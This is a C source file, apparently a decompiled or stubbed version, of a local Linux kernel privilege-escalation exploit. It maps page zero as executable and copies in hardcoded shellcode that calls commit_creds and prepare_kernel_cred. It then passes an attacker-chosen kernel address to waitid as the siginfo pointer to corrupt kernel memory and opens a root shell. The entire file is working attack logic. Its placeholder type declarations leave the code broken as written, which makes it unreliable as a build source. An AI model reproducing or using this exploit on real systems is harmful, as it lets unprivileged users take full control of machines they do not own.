
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int siginfo_t ;
typedef int shellcode ;
typedef scalar_t__ prepare_kernel_cred_t ;
typedef int pid_t ;
typedef scalar_t__ commit_creds_t ;


 int EXIT_FAILURE ;
 int EXIT_SUCCESS ;
 int MAP_ANON ;
 int MAP_FIXED ;
 int MAP_PRIVATE ;
 int PROT_EXEC ;
 int PROT_READ ;
 int PROT_WRITE ;
 int P_PID ;
 int WCONTINUED ;
 int WEXITED ;
 int WSTOPPED ;
 int _exit (int) ;
 scalar_t__ commit_creds ;
 int fork () ;
 scalar_t__ get_kernel_sym (char*) ;
 void* get_root ;
 int get_shell () ;
 int memcpy (int ,unsigned char*,int) ;
 char* mmap (int ,int,int,int,int,int ) ;
 int perror (char*) ;
 scalar_t__ prepare_kernel_cred ;
 int printf (char*,...) ;
 void** rawmemchr (unsigned char*,int) ;
 scalar_t__ strtoul (char*,char**,int ) ;
 int waitid (int ,int,int *,int) ;

int main(int ac, char **av)
{
 if (ac != 2) {
  printf("./exploit kernel_offset\n");
  printf("exemple = 0xffffffff81f3f45a");
  return EXIT_FAILURE;
 }


 prepare_kernel_cred = (prepare_kernel_cred_t)get_kernel_sym("prepare_kernel_cred");
 commit_creds = (commit_creds_t)get_kernel_sym("commit_creds");


 pid_t pid;



 printf("[+] Try to allocat 0x00000000...\n");
 if (mmap(0, 4096, PROT_READ|PROT_WRITE|PROT_EXEC,MAP_ANON|MAP_PRIVATE|MAP_FIXED, -1, 0) == (char *)-1){
  printf("[-] Failed to allocat 0x00000000\n");
  return -1;
 }
 printf("[+] Allocation success !\n");
 unsigned char shellcode[] =
 { 0x48, 0xC7, 0xC0, 0x5A, 0xF4, 0xF3, 0x81, 0x48, 0xC7, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0xB8, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0xFF, 0xD0, 0x48, 0x31, 0xC0, 0xC3 };
 void **get_root_offset = rawmemchr(shellcode, 0x42);
 (*get_root_offset) = get_root;

 memcpy(0, shellcode, sizeof(shellcode));


 if(-1 == (pid = fork())) {
  perror("fork()");
  return EXIT_FAILURE;
 }

 if(pid == 0) {
  _exit(0xDEADBEEF);
  perror("son");
  return EXIT_FAILURE;
 }

 siginfo_t *ptr = (siginfo_t*)strtoul(av[1], (char**)0, 0);
 waitid(P_PID, pid, ptr, WEXITED | WSTOPPED | WCONTINUED);


 pid = fork();
 printf("fork_ret = %d\n", pid);
 if (pid > 0)
  get_shell();
 return EXIT_SUCCESS;
}
